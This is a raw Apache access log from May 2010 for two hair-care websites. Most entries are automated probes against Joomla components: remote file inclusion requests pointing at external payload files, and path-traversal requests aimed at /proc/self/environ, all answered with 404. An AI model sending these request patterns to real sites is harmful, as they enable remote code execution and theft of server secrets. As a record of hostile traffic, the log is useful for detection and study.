80.65.166.74 - - [18/May/2010:04:04:27 -0700] "GET /logs/access_100201.log//xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.65.166.74 - - [18/May/2010:04:04:28 -0700] "GET /logs/access_100201.log//xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.65.166.74 - - [18/May/2010:04:04:28 -0700] "GET /logs//xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.65.166.74 - - [18/May/2010:04:04:28 -0700] "GET /xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.65.166.74 - - [18/May/2010:04:05:01 -0700] "GET /xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.65.166.74 - - [18/May/2010:04:05:01 -0700] "GET /logs//xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.65.166.74 - - [18/May/2010:04:05:01 -0700] "GET /logs/access_100201.log%20%20//xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.65.166.74 - - [18/May/2010:04:05:01 -0700] "GET /logs//xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.65.166.74 - - [18/May/2010:04:05:01 -0700] "GET /xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.65.166.74 - - [18/May/2010:04:05:02 -0700] "GET /logs/access_100201.log%20%20//xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.65.166.74 - - [18/May/2010:04:05:12 -0700] "GET /logs/access.log//xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.65.166.74 - - [18/May/2010:04:05:12 -0700] "GET /logs/access.log//xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.65.166.74 - - [18/May/2010:04:05:12 -0700] "GET /xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.65.166.74 - - [18/May/2010:04:05:12 -0700] "GET /logs//xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.65.166.74 - - [18/May/2010:04:05:12 -0700] "GET /logs//xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.65.166.74 - - [18/May/2010:04:05:12 -0700] "GET /xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.245.220.19 - - [18/May/2010:04:05:46 -0700] "GET /logs/access.log%20%20/error.php?dir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.245.220.19 - - [18/May/2010:04:05:46 -0700] "GET /error.php?dir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.245.220.19 - - [18/May/2010:04:05:46 -0700] "GET /logs/error.php?dir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.65.166.74 - - [18/May/2010:04:05:57 -0700] "GET /logs/access.log//xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.65.166.74 - - [18/May/2010:04:05:57 -0700] "GET /logs//xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.65.166.74 - - [18/May/2010:04:05:57 -0700] "GET /xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
202.63.101.52 - - [18/May/2010:04:05:57 -0700] "GET / HTTP/1.1" 200 926 "http://www.samsdirectory.com/health/?p=64" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" "www.freehairsecrets.com"
80.65.166.74 - - [18/May/2010:04:06:00 -0700] "GET /logs/access.log//xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.65.166.74 - - [18/May/2010:04:06:00 -0700] "GET /logs//xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.65.166.74 - - [18/May/2010:04:06:00 -0700] "GET /xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
202.63.101.52 - - [18/May/2010:04:06:21 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" "www.freehairsecrets.com"
202.63.101.52 - - [18/May/2010:04:06:25 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" "www.freehairsecrets.com"
80.65.166.74 - - [18/May/2010:04:07:26 -0700] "GET /logs/access.log%20%20//xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.65.166.74 - - [18/May/2010:04:07:26 -0700] "GET /logs//xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.65.166.74 - - [18/May/2010:04:07:26 -0700] "GET /xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.65.166.74 - - [18/May/2010:04:08:01 -0700] "GET /logs//xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.65.166.74 - - [18/May/2010:04:08:01 -0700] "GET /xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.65.166.74 - - [18/May/2010:04:08:01 -0700] "GET /logs/access.log%20%20//xajax_functions.php?mosConfig_absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [18/May/2010:04:15:48 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13066 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
85.92.73.143 - - [18/May/2010:04:34:08 -0700] "GET /index.php?option=com_serverstat&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
77.88.25.28 - - [18/May/2010:04:37:58 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13969 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
85.92.73.143 - - [18/May/2010:04:39:36 -0700] "GET /logs/access_100510.log/index.php?option=com_serverstat&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
85.92.73.143 - - [18/May/2010:04:39:36 -0700] "GET /index.php?option=com_serverstat&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
85.92.73.143 - - [18/May/2010:04:39:36 -0700] "GET /logs/index.php?option=com_serverstat&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
77.88.25.28 - - [18/May/2010:04:40:30 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13723 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
85.92.73.143 - - [18/May/2010:04:49:10 -0700] "GET /logs/access_100510.log/index.php?option=com_serverstat&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
85.92.73.143 - - [18/May/2010:04:49:10 -0700] "GET /index.php?option=com_serverstat&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
85.92.73.143 - - [18/May/2010:04:49:10 -0700] "GET /logs/index.php?option=com_serverstat&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
85.92.73.143 - - [18/May/2010:04:50:23 -0700] "GET /logs/access_100125.log/index.php?option=com_serverstat&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
212.95.32.111 - - [18/May/2010:04:58:21 -0700] "GET / HTTP/1.1" 200 926 "-" "Equilibrium" "freehairsecrets.com"
67.195.114.238 - - [18/May/2010:04:58:50 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
67.195.114.238 - - [18/May/2010:04:58:50 -0700] "GET /tmp/?S=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
77.88.25.28 - - [18/May/2010:04:59:37 -0700] "GET /logs/access_091228.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.195.111.220 - - [18/May/2010:05:03:00 -0700] "GET /logs/access_100503.log HTTP/1.0" 200 2519989 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
208.100.59.16 - - [18/May/2010:05:04:11 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
114.108.151.149 - - [18/May/2010:05:07:58 -0700] "GET /logs/access_100405.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://empcl.org/bbs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [18/May/2010:05:07:59 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://empcl.org/bbs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [18/May/2010:05:07:59 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://empcl.org/bbs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [18/May/2010:05:08:00 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://empcl.org/bbs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [18/May/2010:05:08:00 -0700] "GET /logs/access_100405.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://empcl.org/bbs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [18/May/2010:05:08:00 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://empcl.org/bbs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
111.89.128.186 - - [18/May/2010:05:12:29 -0700] "GET /logs/access_100426.log/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [18/May/2010:05:12:29 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [18/May/2010:05:12:29 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
62.140.23.192 - - [18/May/2010:05:13:33 -0700] "GET /logs/access_100125.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.140.23.192 - - [18/May/2010:05:13:33 -0700] "GET /logs/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.140.23.192 - - [18/May/2010:05:13:33 -0700] "GET /index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.140.23.192 - - [18/May/2010:05:13:37 -0700] "GET /logs/access.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
95.158.16.135 - - [18/May/2010:05:14:56 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
95.158.16.135 - - [18/May/2010:05:14:56 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
109.71.40.35 - - [18/May/2010:05:16:45 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
109.71.40.35 - - [18/May/2010:05:16:46 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
109.71.40.35 - - [18/May/2010:05:16:46 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.140.23.192 - - [18/May/2010:05:16:56 -0700] "GET /logs/access.log/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
109.71.40.35 - - [18/May/2010:05:16:56 -0700] "GET /logs/access_100510.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.140.23.192 - - [18/May/2010:05:16:56 -0700] "GET /logs/access_100510.log/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [18/May/2010:05:17:49 -0700] "GET /logs/access_091228.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
81.21.79.214 - - [18/May/2010:05:17:59 -0700] "GET /logs/access_100322.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://playersinn.com/darts/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
81.21.79.214 - - [18/May/2010:05:17:59 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://playersinn.com/darts/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
81.21.79.214 - - [18/May/2010:05:17:59 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://playersinn.com/darts/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
111.89.128.186 - - [18/May/2010:05:18:26 -0700] "GET /logs/access_100405.log/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
208.100.59.16 - - [18/May/2010:05:18:47 -0700] "GET /logs/access_100510.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
208.100.59.16 - - [18/May/2010:05:18:47 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
208.100.59.16 - - [18/May/2010:05:18:47 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
111.89.128.186 - - [18/May/2010:05:19:03 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [18/May/2010:05:19:03 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
204.15.190.163 - - [18/May/2010:05:19:55 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
77.88.25.28 - - [18/May/2010:05:21:42 -0700] "GET /logs/access_091012.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
109.71.40.35 - - [18/May/2010:05:22:48 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
111.89.128.186 - - [18/May/2010:05:22:49 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
111.89.128.186 - - [18/May/2010:05:22:49 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
109.71.40.35 - - [18/May/2010:05:22:53 -0700] "GET /logs/access_100510.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.140.23.192 - - [18/May/2010:05:23:02 -0700] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.140.23.192 - - [18/May/2010:05:23:02 -0700] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.140.23.192 - - [18/May/2010:05:23:06 -0700] "GET /logs/access_100125.log%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.140.23.192 - - [18/May/2010:05:23:06 -0700] "GET /logs/access.log%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [18/May/2010:05:23:12 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [18/May/2010:05:23:12 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [18/May/2010:05:23:12 -0700] "GET /logs/access_100412.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [18/May/2010:05:23:12 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [18/May/2010:05:23:12 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [18/May/2010:05:23:13 -0700] "GET /logs/access_100412.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [18/May/2010:05:24:25 -0700] "GET /logs/access_100322.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [18/May/2010:05:24:26 -0700] "GET /logs/access_100322.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.140.23.192 - - [18/May/2010:05:26:09 -0700] "GET /logs/access.log/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.140.23.192 - - [18/May/2010:05:26:13 -0700] "GET /logs/access_100510.log/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.100.59.16 - - [18/May/2010:05:26:16 -0700] "GET /logs/access_100412.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
204.15.190.163 - - [18/May/2010:05:28:36 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
204.15.190.163 - - [18/May/2010:05:28:36 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
204.15.190.163 - - [18/May/2010:05:28:36 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
77.221.137.18 - - [18/May/2010:05:28:40 -0700] "GET /logs/access_100405.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.137.18 - - [18/May/2010:05:28:40 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.137.18 - - [18/May/2010:05:28:40 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.115.208.200 - - [18/May/2010:05:29:42 -0700] "GET /index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404